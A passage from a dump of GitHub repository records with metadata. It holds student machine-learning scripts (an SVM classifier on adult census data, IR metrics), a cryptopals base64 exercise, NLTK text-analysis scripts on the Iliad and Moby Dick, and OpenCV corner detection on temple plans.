plt.figure()\n ax = fig.add_subplot(111)\n ind = np.arange(1, len(x)+1)\n if type(x[0]) is float:\n plt.plot([i - width / 2 for i in x], po, color='blue', linestyle='-')\n plt.plot([i + width / 2 for i in x], na, color='orange', linestyle=':')\n else:\n plt.bar([i - width / 2 for i in ind], po, facecolor='red', width=width, edgecolor='white', label='>50', lw=1)\n plt.bar([i + width / 2 for i in ind], na, alpha=1, width=width, facecolor='yellowgreen', edgecolor='white',\n label='<=50', lw=1)\n plt.xticks(ind, x)\n ax.set_xticklabels(x, rotation=50)\n plt.xlabel(head)\n plt.ylabel('amount')\n plt.legend(loc='upper right')\n plt.show()\n fig.savefig(f'{head}.png')\n\n def one_entropy(self, a, sums):\n return -a / sums * math.log(a / sums, 2)\n\n def ent(self, x):\n dic = {}\n for i in x:\n if i in dic:\n dic[i] += 1\n else:\n dic[i] = 1\n sums = sum(dic.values())\n e = 0\n for i in dic:\n e += self.one_entropy(dic[i], sums)\n return e\n\n def visualize(self, positive, negative, q, data, label, dual, _gamma):\n\n plt.xlabel('X1') # 横坐标\n\n plt.ylabel('X2') # 纵坐标\n\n plt.scatter(positive[:, 0], positive[:, 1], c='b', marker='+', alpha=0.5) # +1样本红色标出\n\n plt.scatter(negative[:, 0], negative[:, 1], c='g', marker='o', alpha=0.5) # -1样本绿色标出\n nonZeroAlpha = dual[0]\n\n supportVector = data # 支持向量\n\n y = label[q] # 支持向量对应的标签\n\n plt.scatter(supportVector[:, 0], supportVector[:, 1], s=80, c='y', alpha=0.5, marker='o') # 标出支持向量\n\n print(\"支持向量个数:\", len(q))\n\n X1 = np.arange(0, 1, 0.05)\n\n X2 = np.arange(0, 1, 0.05)\n\n x1, x2 = np.meshgrid(X1, X2)\n\n g = _gamma\n\n for i in range(len(q)):\n # g+=nonZeroAlpha[i]*y[i]*(x1*supportVector[i][0]+x2*supportVector[i][1])\n\n g += nonZeroAlpha[i] * y[i] * np.exp(\n -0.5 * ((x1 - supportVector[i][0]) ** 2 + (x2 - supportVector[i][1]) ** 2) / (g ** 2))\n\n plt.contour(x1, x2, g, 0, cmap=plt.cm.coolwarm) # 画出超平面\n\n plt.title(\"decision boundary\")\n\n plt.show()\n\n\nif __name__ == '__main__':\n s = Data_Proccess('SVM')\n data = s.read_data('adult.csv')\n heads, categories, data, nomalize = s.preprocess_data(data)\n en = []\n\n lo = len(data[0]) - 1\n dic = s.quantize(categories, lo)\n data = s.deal_data(dic, data, categories)\n s.nomalize(nomalize, data)\n print('Nomalized')\n print('Sample number: ', len(data))\n basic_e = s.ent(data[:, -1])\n print('Basic entropy is: ', basic_e)\n pass\n for i in range(len(heads) - 1):\n en.append((i, heads[i], s.information_gain(i, data)))\n en.sort(key=lambda x: x[2])\n print('Information gain:')\n for i in en:\n print(i)\n e = np.array(en)\n\n\n name_list = np.array(e[:,1])\n num_list = np.array(e[:,2])\n\n test_data, train_data = s.cross_validation(data, 10)\n\n print('cross validation')\n\n #np.save('tests', test_data)\n #np.save('trains', train_data)\n\n trainset = train_data[:, :-1]\n label = train_data[:, -1]\n\n test_set = test_data[:, :-1]\n real_label = test_data[:, -1]\n print('SVM working:')\n #SVMClassifier = SMO(trainset, label, 1, 0.001, 40)\n #SVMClassifier.visualize(po, ne)\n\n pp = []\n nn = []\n for i in range(len(label)):\n if label[i] == 1:\n pp.append(trainset[i])\n else:\n nn.append(trainset[i])\n pp = np.array(pp)\n nn = np.array(nn)\n\n #clf = svm.SVC(kernel='poly', degree=3, C=150)\n #clf = svm.SVC(kernel='linear')\n clf = svm.SVC(kernel='rbf',gamma= 0.7, C =150)\n clf.fit(trainset, label)\n ans = clf.predict(test_set)\n #plt.scatter(pp[:, 0], pp[:, 1], marker='1', c='g')\n #plt.scatter(nn[:, 0], nn[:, 1], marker='4', c='k')\n count,tp,tn,fp, fn= 0,0,0,0,0\n\n for i in range(len(ans)):\n if ans[i] == real_label[i] and real_label[i] == 1:\n tp += 1\n count += 1\n\n if ans[i] == real_label[i] and real_label[i] == -1:\n tn += 1\n count += 1\n\n if ans[i] != real_label[i] and real_label[i] == -1:\n fp += 1\n\n if ans[i] != real_label[i] and real_label[i] == 1:\n fn += 1\n\n sup = clf.support_\n dual = clf.dual_coef_\n s.visualize(pp, nn, sup, clf.support_vectors_, label, dual, clf._gamma)\n tru = np.array(real_label)\n pre = np.array(ans)\n print(count)\n precision = tp/(tp+fp)\n recall = tp/(tp+fn)\n f1score = 2*precision*recall/(precision+recall)\n print('precision: ',precision,' recall: ',recall,' f1score: ',f1score)\n V = explained_variance_score(tru, pre)\n print('variance: ',V)\n #plt.scatter(sup[:, 0], sup[:, 1], c='b', marker='>')\n #plt.show()\n print('The training accuracy:', count / len(ans))\n\n\n\n"
},
{
"alpha_fraction": 0.570806086063385,
"alphanum_fraction": 0.6394335627555847,
"avg_line_length": 40.54545593261719,
"blob_id": "1b3efe71c4f5dd9ea7f4cedec3d5000efd731de5",
"content_id": "9183f07b1ae222c39892bab01145c84698bcedd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 918,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 22,
"path": "/perceptron/ir.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "from numpy import *\nimport numpy as np\ndef Caculate_IR(retrieved,relevant):\n recall = []\n precision = []\n f1score = []\n interprecision = []\n for i in range(10):\n precision.append(100*relevant[i]/retrieved[i])\n recall.append(100*relevant[i] / 200)\n f1score.append(2*precision[i]*recall[i]/(precision[i]+recall[i]))\n interprecision.append(precision[9])\n for i in range(9, 0, -1):\n temp = max(precision[i-1],precision[i])\n interprecision.append(temp)\n interprecision.reverse()\n return recall,precision, f1score, interprecision\nif __name__ == '__main__':\n retrieved = [10,20,30,40,50,60,70,80,90,100]\n relevant =[7,14,20,27,30,35,37,40,40,40]\n recall, precision, f1score, interprecision = Caculate_IR(retrieved, relevant)\n print('precision: ', precision, ' recall: ', recall, ' f1score: ', f1score, 'interprecision: ', interprecision)\n\n\n\n\n"
},
{
"alpha_fraction": 0.5420219302177429,
"alphanum_fraction": 0.5706455707550049,
"avg_line_length": 24.27692222595215,
"blob_id": "ac430a3d9a542d24132f1d3d6bfc3fe9fd70b1ae",
"content_id": "36a4288225fd4e9b1f00a115013aa851fd230317",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1642,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 65,
"path": "/perceptron/plottest.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nimport scipy\nfrom sklearn import svm\n\ndef loadDataSet(filename):\n a=np.load(filename)\n dataset=[]\n labels=[]\n for i in a:\n x,y=i[2],i[7]\n dataset.append([x,y])\n labels.append(i[14])\n return np.array(dataset), np.array(labels)\n\ndef main():\n data='nomalized_samples.npy'\n feature, lable = loadDataSet(data)\n dataArr_test = feature[:1000]\n labelArr_test = lable[:1000]\n x1_samples = []\n x2_samples = []\n\n for i in range(900):\n q = dataArr_test[i]\n\n if labelArr_test[i] == 1:\n x1_samples.append(q)\n else:\n x2_samples.append(q)\n x1 = np.array(x1_samples)\n x2 = np.array(x2_samples)\n\n fig = plt.figure()\n\n plt.scatter(x1[:,0], x1[:,1], marker='+')\n plt.scatter(x2[:,0], x2[:,1], c='green', marker='o')\n\n X = np.concatenate((x1, x2), axis=0)\n Y = np.array(labelArr_test)\n\n C = 200.0 # SVM regularization parameter\n clf = svm.SVC(kernel='rbf', gamma=0.7, C=C)\n clf.fit(X, Y)\n\n h = .02 # step size in the mesh\n # create a mesh to plot in\n x_min, x_max = 0,1\n y_min, y_max = 0,1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n\n # Plot the decision boundary. For that, we will assign a color to each\n # point in the mesh [x_min, m_max]x[y_min, y_max].\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\n\n # Put the result into a color plot\n Z = Z.reshape(xx.shape)\n plt.contour(xx, yy, Z, cmap=plt.cm.Paired)\n\n plt.show()\n\nif __name__=='__main__':\n main()"
}
] | 9 |
bogatyy/cryptopals | https://github.com/bogatyy/cryptopals | 09bf26d89632521fdd280460a4c052dbfc819fcf | 2b580c6cfc780726fdf1a9c8e1fd3c5078d1b8e8 | 8ce31d9acc97133df4e2438939a24f1a8ab6208d | refs/heads/master | 2022-04-20T02:54:31.287461 | 2020-04-22T10:52:58 | 2020-04-22T10:52:58 | 256,513,118 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.43881526589393616,
"alphanum_fraction": 0.5339049100875854,
"avg_line_length": 29.547618865966797,
"blob_id": "5c4e973a18fd8a61ba34a569c974cabd808c5cc2",
"content_id": "6351b9989caf3b22f610a4d358d505bdc3e05bd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1283,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 42,
"path": "/set_1/challenge_1.py",
"repo_name": "bogatyy/cryptopals",
"src_encoding": "UTF-8",
"text": "import base64\nfrom hexbytes import HexBytes\n\ndef encode_base64(ascii_string):\n binary = ''.join(\n format(ord(symbol), '08b')\n for symbol in ascii_string\n )\n extra_zeros = (6 - len(binary) % 6) % 6\n binary += '0' * extra_zeros\n sextets = [binary[i:i + 6] for i in range(0, len(binary), 6)]\n chars = []\n for sextet in sextets:\n value = int(sextet, 2)\n if value < 26:\n chars.append(chr(ord('A') + value))\n elif value < 26 * 2:\n chars.append(chr(ord('a') + value - 26))\n elif value < 26 * 2 + 10:\n chars.append(chr(ord('0') + value - 26 * 2))\n elif value == 62:\n chars.append('+')\n elif value == 63:\n chars.append('/')\n else:\n raise TypeError('wtf')\n padding_size = (3 - len(ascii_string) % 3) % 3\n return ''.join(chars) + '=' * padding_size\n\n\nif __name__ == '__main__':\n inputs = [\n HexBytes('49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d').decode(),\n 'Man',\n 'pleasure.',\n 'leasure.',\n 'easure.',\n 'asure.',\n 'sure.',\n ]\n for input in inputs:\n print(input, encode_base64(input), base64.b64encode(input.encode()))\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 26,
"blob_id": "eb588925218c2b5247a5b270ab8abb704460fb40",
"content_id": "257f467278f0fe32cce6267a8233b2cc488e45d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 54,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 2,
"path": "/README.md",
"repo_name": "bogatyy/cryptopals",
"src_encoding": "UTF-8",
"text": "# cryptopals\nMy solutions for https://cryptopals.com/\n"
}
] | 2 |
amkaminski/PersonalProjects-LogosEndiathetos | https://github.com/amkaminski/PersonalProjects-LogosEndiathetos | 42feb7caa0619d9949725cdc257410c9157c3426 | ab4ef2a8b7bfb21f3ac722e69b898cd0933a1aa5 | f22851a5414f59f588810f5901ec74306d2e583e | refs/heads/master | 2023-04-17T07:37:57.515632 | 2021-05-02T20:20:54 | 2021-05-02T20:20:54 | 234,774,523 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5134291052818298,
"alphanum_fraction": 0.5262336134910583,
"avg_line_length": 19.95833396911621,
"blob_id": "5a829fabb8d357f05889ebff7ae79bed1f7d6c93",
"content_id": "f2c023719e0c1a3b5ee9eda5293d6c9d3ef8ddd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3202,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 144,
"path": "/Illiad_Reader/ReadHomer.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 14 11:26:36 2018\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\n#import statements\r\n\r\n\r\nimport xml.etree.ElementTree as ET\r\nimport nltk\r\n\r\nfile = 'tlg0012.tlg001.perseus-eng3.xml'\r\nns = {'tei':'http://www.tei-c.org/ns/1.0',}\r\n\r\nxml = ET.parse(file).getroot()\r\n \r\ncards = xml.findall('.//tei:div[@subtype=\"card\"]', ns)\r\nprint(len(cards), 'cards found')\r\n \r\npara = []\r\n \r\nfor card in cards:\r\n para.append(' '.join(card.itertext()))\r\n \r\nplaintext = []\r\n\r\n\r\n# loop over xml chapter elements\r\nfor card in cards:\r\n \r\n # delete notes\r\n for note in card.findall('note'):\r\n card.remove(note)\r\n \r\n # extract text\r\n this_text = ' '.join(card.itertext())\r\n \r\n # add to long string\r\n plaintext.append(this_text)\r\n \r\n# now paste it all together\r\niliad = ' '.join(plaintext) \r\n\r\n#look for Achilles\r\ndef paraHasAchilles(para):\r\n \r\n result = False\r\n \r\n if 'Achil' in para:\r\n result = True\r\n elif 'Peleus' in para:\r\n result = True\r\n \r\n return result\r\n#import os\r\n#from nltk.parse import stanford\r\n \r\nsentences = nltk.sent_tokenize(iliad)\r\n\r\ntokens = nltk.word_tokenize(sentences[2])\r\n\r\n#this is where we have a problem\r\ntagged = nltk.pos_tag(tokens)\r\n\r\nadjs = []\r\nnouns = []\r\n\r\n#for para in iliad:\r\n #if paraHasAchilles(para):\r\n \r\n #for tok, pos in tagged: \r\n #if pos == 'JJ':\r\n #adjs.append(tok)\r\n #elif pos.startswith('NN'):\r\n #nouns.append(tok)\r\n \r\n #print('adjs: ', adjs)\r\n #print('nouns: ', nouns)\r\n \r\n\r\nfor sentence in sentences:\r\n if paraHasAchilles(sentence):\r\n tokens = nltk.word_tokenize(sentence)\r\n tagged = nltk.pos_tag(tokens)\r\n for tok, pos in tagged:\r\n if pos == 'JJ':\r\n adjs.append(tok)\r\n elif pos.startswith('NN'):\r\n nouns.append(tok)\r\n\r\n#print('adjs: ', adjs) \r\n#print('nouns: ', nouns) \r\n \r\ndef chunks(l, n):\r\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\r\n for i in range(0, len(l), n):\r\n yield l[i:i + n]\r\n \r\n#counter = 0\r\nstep = 100\r\nposWrds = []\r\nnegWrds = []\r\n\r\ncounter = 0\r\nfor word in adjs:\r\n counter = counter + 1\r\n #correct operator for divisible by 100? \r\n if counter % step == 0:\r\n #if a word matches a word in \"posWords\" increase a count and add that count to a list\r\n \r\n \r\n \r\n \r\nposWords = \"valiant, brilliant, swift-footed, glorious, great-hearted, godlike, godly, fair, great\"\r\nnegWords = \"perish, perished, fatal, distressed, bitter, hollow, dead, evil\"\r\n\r\n\r\n\r\n\r\n#posCount = 0\r\n#negCount = 0\r\n\r\n#adj = str(adjs)\r\n#non = str(nouns)\r\n\r\n\r\n\r\n#for word in adj:\r\n #for i in posWords.split():\r\n #posCount = 0\r\n #test = []\r\n #if word == i:\r\n #posCount = posCount + 1\r\n #test.append(word)\r\n#print('PosCount: ', posCount)\r\n \r\n#for word in non:\r\n #for i in negWords.split():\r\n #negCount = 0\r\n #if word == i:\r\n #negCount = negCount + 1\r\n#print('NegCount: ', negCount)\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n "
},
{
"alpha_fraction": 0.6104611158370972,
"alphanum_fraction": 0.6421197652816772,
"avg_line_length": 23.086206436157227,
"blob_id": "31e7448253c4904ff31c5be62e0e1ccfa767f341",
"content_id": "42fa3ab31ee3e98a712d5eab89693a2180461077",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1453,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 58,
"path": "/TempleLayout_Analyzer/HarrisCornerDetect2-Iter.2.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 5 14:07:06 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n#a = np.array(aList[]) then they become booliens\r\n#a > 0 gives us an array of booliens\r\n#sum(a > 0) returns all trues\r\nfilename = 'TempleTeos.jpg'\r\nimg = cv2.imread(filename)\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\ngray = np.float32(gray)\r\ndst = cv2.cornerHarris(gray, 2, 3, 0.04)\r\n\r\n#Dilates the markers\r\ndst = cv2.dilate(dst, None)\r\n\r\nimg[dst>0.01*dst.max()]=[0, 0, 255]\r\n\r\nthreshold = 30\r\n\r\nTempleWidth = []\r\nfor y in range(len(dst)):\r\n TempleWidths=[]\r\n for x in range(len(dst[0])):\r\n if dst[y, x] > threshold:\r\n TempleWidths.append(dst[y, x])\r\n TempleWidth.append(int(len(TempleWidths)))\r\n \r\nTempleHeight=[]\r\nfor x in range(len(dst[0])):\r\n TempleHeights=[]\r\n for y in range(len(dst)):\r\n if dst[y, x] > threshold:\r\n TempleHeights.append(dst[y, x])\r\n TempleHeight.append(int(len(TempleHeights)))\r\n\r\nWidthPeaks = []\r\nTempleWidth.sort(reverse=True)\r\n#WidthPeaks.append(TempleWidth[0])\r\n#WidthPeaks.append(TempleWidth[1])\r\n#WidthPeaks.append(TempleWidth[:10])\r\n\r\n#dec = zip(TempleWidth, range(len(TempleWidth)))\r\n#for w, p in list(sorted(dec, reverse=True))[:5]:\r\n# print(w, p)\r\n\r\n#len(img_dilation)\r\n\r\n#Take the two spikes from each list\r\n#and use the (x, y) vals of each to \r\n#determine edges of the temple stylobate\r\ncv2.imwrite('output_TempleTeos.jpg', img)"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.6875,
"avg_line_length": 25.75,
"blob_id": "ba7d9dccef3158d855f4964cc3a4102903800707",
"content_id": "b925fed6415ba59a66bbd058d36cdacb1d32799b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 224,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 8,
"path": "/Illiad_Reader/HomerReader.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 14 11:02:02 2018\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nURL = 'https://raw.githubusercontent.com/PerseusDL/canonical-greekLit/master/data/tlg0012/tlg001/tlg0012.tlg001.perseus-eng3.xml'\r\n\r\n"
},
{
"alpha_fraction": 0.6592920422554016,
"alphanum_fraction": 0.6814159154891968,
"avg_line_length": 23.45945930480957,
"blob_id": "d8e91617c99ae63909bc3669908ca43b9e5a34a4",
"content_id": "a3784bab9934276c598679b138effd6425449fb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 904,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 37,
"path": "/Scribe_Project/test_code.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 26 13:16:38 2021\n\n@author: am_ka\n\"\"\"\n\nimport nltk\n#nltk.download('nps_chat')\n#posts = nltk.corpus.nps_chat.xml_posts()[:10000]\n\n\n#def dialogue_act_features(post):\n# features = {}\n# for word in nltk.word_tokenize(post):\n# features['contains({})'.format(word.lower())] = True\n# return features\n\n#def TypeDetect(line):\n# print(classifier.classify(dialogue_act_features(line)))\n\ndef tokenizeWord(word):\n word_tok = nltk.word_tokenize(word)\n return word_tok\n\n\n#featuresets = [(dialogue_act_features(post.text), post.get('class')) for post in posts]\n#\n#size = int(len(featuresets) * 0.1)\n#\n#train_set, test_set = featuresets[size:], featuresets[:size]\n#\n#classifier = nltk.NaiveBayesClassifier.train(train_set)\n#\n#print(nltk.classify.accuracy(classifier, test_set))\n#\n#print(classifier.classify(dialogue_act_features(\"I saw a box.\")))"
},
{
"alpha_fraction": 0.5149674415588379,
"alphanum_fraction": 0.5336225628852844,
"avg_line_length": 22.76344108581543,
"blob_id": "f4ec93f17db28cc1d055ed45aef2d9eb8ff85f05",
"content_id": "dab7f4fc7312003534819e8715fa688a351991a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2305,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 93,
"path": "/Scribe_Project/scribe.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 16 12:51:16 2020\r\n\r\n@author: am_ka\r\n\"\"\"\r\n\r\nimport nltk\r\nfrom nltk.book import *\r\n\r\nimport re\r\n\r\nmoby_lines = nltk.corpus.gutenberg.sents('melville-moby_dick.txt')\r\nprint(\"Corpus Loaded\")\r\n\r\n# Stores each encoded sentence\r\ncodex = []\r\n# Stores each unique sentence code\r\nreference = []\r\n\r\n#\r\n# Iterate through each sentence, initiate an empty string and iterate through\r\n# each word. Tokenize/tag each word and add the tags denoting an adjective,\r\n# noun, verb or adverb to the empty string, creating a sequence of tags that \r\n# denotes the basic structure of that sentence. Add the sequence to the codex \r\n# list.\r\n# \r\n\r\ncount = 0\r\nfor lines in moby_lines:\r\n sequence = ''\r\n for i in lines:\r\n count += 1\r\n # print(\"Processing Word \" + str(count) + ': ' + i)\r\n token = nltk.word_tokenize(i)\r\n tagged = nltk.pos_tag(token)\r\n for tok, tag in tagged:\r\n if tag.startswith('JJ'):\r\n sequence += '(JJ)'\r\n elif tag.startswith('NN'):\r\n sequence += '(NN)'\r\n elif tag.startswith('V'):\r\n sequence += '(V)'\r\n elif tag.startswith('R'):\r\n sequence += '(R)'\r\n codex.append(sequence) \r\n \r\nprint(\"Codex Complete\") \r\n\r\n# Compile an alternate list of unique existing sequences. \r\nfor i in codex:\r\n if i in reference:\r\n pass\r\n else:\r\n reference.append(i)\r\n \r\nprint(\"Reference Complete\")\r\n\r\n# Compare the amount of sentence sequences with individual known sequences.\r\nprint(\"Length of Codex: \" + str(len(codex)))\r\nprint(\"Length of Reference: \" + str(len(reference)))\r\n\r\n''' \r\n Determine which tags begin each sentence,\r\n '(NN)': 23\r\n '(VV)': 17\r\n etc.\r\n \r\n Moby Dick\r\n NN: 5085\r\n V: 2382\r\n '': 99\r\n R: 1729\r\n JJ: 764\r\n \r\n'''\r\n#c = 0\r\n#starters = {}\r\n#expression = r\"^(\\([A-Z][A-Z]\\)|\\([A-Z]\\))+?\"\r\n#for j in codex:\r\n# if j != '':\r\n# c += 1\r\n# print(str(c) + \": \" + j)\r\n# m = (re.search(expression, j)).group(1)\r\n# if m in starters:\r\n# starters[m] += 1\r\n# else:\r\n# starters[m] = 1\r\n# else:\r\n# if '' in starters:\r\n# starters[''] += 1\r\n# else:\r\n# starters[''] = 1\r\n\r\n"
},
{
"alpha_fraction": 0.6156583428382874,
"alphanum_fraction": 0.6583629846572876,
"avg_line_length": 16.5,
"blob_id": "9c6c51740278358382e1a0561d33c037feaedded",
"content_id": "d28522e7dfde9285cace8225b32a3caa65a1c89d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 281,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 16,
"path": "/Scribe_Project/test_II.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 3 18:40:37 2021\n\n@author: am_ka\n\"\"\"\n\nimport nltk\n\ndef tokenizeWord(word):\n word_tok = nltk.word_tokenize(word)\n return word_tok\n\ndef tagPhrase(phrase):\n phrase_tag = nltk.pos_tag(tokenizeWord(phrase))\n return phrase_tag\n\n"
},
{
"alpha_fraction": 0.5929387211799622,
"alphanum_fraction": 0.6053997874259949,
"avg_line_length": 21.880952835083008,
"blob_id": "b4c31803f9d143f8c56fcdaadf08a33b5f642942",
"content_id": "26c95ff13dda6c83304330370fdbf5934f867e72",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 963,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 42,
"path": "/Scribe_Project/scribe_II.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 3 18:50:27 2021\n\n@author: am_ka\n\"\"\"\n\nimport nltk\n\n# Load NLTK Corpus\n#from nltk.book import *\n#moby_lines = nltk.corpus.gutenberg.sents('melville-moby_dick.txt')\n#print(\"Corpus Loaded\")\n\n\ndef tokenizeWord(word):\n word_tok = nltk.word_tokenize(word)\n return word_tok\n\ndef tagPhrase(phrase):\n phrase_tag = nltk.pos_tag(tokenizeWord(phrase))\n return phrase_tag\n\ngram = \"NP: {<DT>?<JJ>*<NN>}\"\n\ndef makeTree(sentence, grammar):\n cp = nltk.RegexpParser(grammar)\n tree = cp.parse(tagPhrase(sentence))\n print(tree)\n # tree.draw()\n\n''' \n Declarative Sentence: subject + verb ... (subj + VERB)\n \n Interrogative Sentence: (word +) auxiliary + subject + verb \n \n Imperative Sentence: base verb... (+ VERB +)\n \n Exclamative Sentence: 'What' (+ adjective) + noun + subject + verb\n 'How' (+ adjective/adverb) + subject + verb\n \n'''\n\n\n"
},
{
"alpha_fraction": 0.5176304578781128,
"alphanum_fraction": 0.5557122826576233,
"avg_line_length": 20.54838752746582,
"blob_id": "8058655d9773b5c5e9516e5070d69e0f57c12bcd",
"content_id": "d49ba2409048657f556a34228e53f8a2de82f55a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 709,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 31,
"path": "/TempleLayout_Analyzer/Concept1.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 11 11:02:51 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\ndarkSpace = []\r\nwhiteSpace = []\r\notherDark = []\r\n\r\nimg = Image.open(\"TempleTeos.jpg\")\r\npx = img.getpixel((x, y))\r\nfor y in range(img.height):\r\n for x in range(img.width):\r\n if px = (255, 255, 255):\r\n whiteSpace.append(px)\r\n elif px = (0, 0, 0):\r\n darkSpace.append(((px),(x, y)))\r\n otherDark.append(px)\r\n\r\n\r\n#WidthPeaks = []\r\notherDark.sort(reverse=True)\r\n \r\n#dec = zip(TempleWidth, range(len(TempleWidth)))\r\n#for w, p in list(sorted(dec, reverse=True))[:5]:\r\n# print(w, p) "
},
{
"alpha_fraction": 0.5448379516601562,
"alphanum_fraction": 0.5795026421546936,
"avg_line_length": 20.913793563842773,
"blob_id": "12932645ff01d35c99a9c72d29328c8b0f365d1d",
"content_id": "e69e6e2a226c4006a83061ec61358febd3a1e823",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1327,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 58,
"path": "/TempleLayout_Analyzer/HarrisCornerDetect3.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 22 15:45:19 2019\r\n\r\n@author: Alex\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n#a = np.array(aList[]) then they become booliens\r\n#a > 0 gives us an array of booliens\r\n#sum(a > 0) returns all trues\r\nfilename = 'Temple.png'\r\nimg = cv2.imread(filename)\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\ngray = np.float32(gray)\r\ndst = cv2.cornerHarris(gray, 2, 3, 0.04)\r\n\r\n#Dilates the markers\r\ndst = cv2.dilate(dst, None)\r\n\r\nimg[dst>0.01*dst.max()]=[0, 0, 255]\r\n\r\nrowSums = []\r\na = np.array(dst[0])\r\n#for y in range(len(dst)):\r\n #a = np.array(dst)\r\nprint(sum(a > 0))\r\n \r\n#rowSums = []\r\n#for y in range(len(dst)):\r\n# rowSums.append(sum(a > 0))\r\n# \r\n#colSums = []\r\n\r\n#for x in range(len(dst[0])):\r\n# colSums.append(sum(dst[:,x]))\r\n \r\n#threshold = 30\r\n\r\n#TempleWidth = []\r\n#for y in range(len(dst)):\r\n# TempleWidths=[]\r\n# for x in range(len(dst[0])):\r\n# if dst[y, x] > threshold:\r\n# TempleWidths.append(dst[y, x])\r\n# TempleWidth.append(int(len(TempleWidths)))\r\n# \r\n#TempleHeight=[]\r\n#for x in range(len(dst)):\r\n# TempleHeights=[]\r\n# for x in range(len(dst[0])):\r\n# if dst[y, x] > threshold:\r\n# TempleHeights.append(dst[y, x])\r\n# TempleHeight.append(int(len(TempleHeights)))\r\n\r\ncv2.imwrite('output.jpg', img)"
},
{
"alpha_fraction": 0.5937122106552124,
"alphanum_fraction": 0.6324062943458557,
"avg_line_length": 20.405405044555664,
"blob_id": "0809963429f8e4ecd503a92066e33a54d10ac2b4",
"content_id": "7dd1040cd83fcecf2a7c5e3c788c03ec09377234",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 827,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 37,
"path": "/Illiad_Reader/iliadPerseus.py",
"repo_name": "amkaminski/PersonalProjects-LogosEndiathetos",
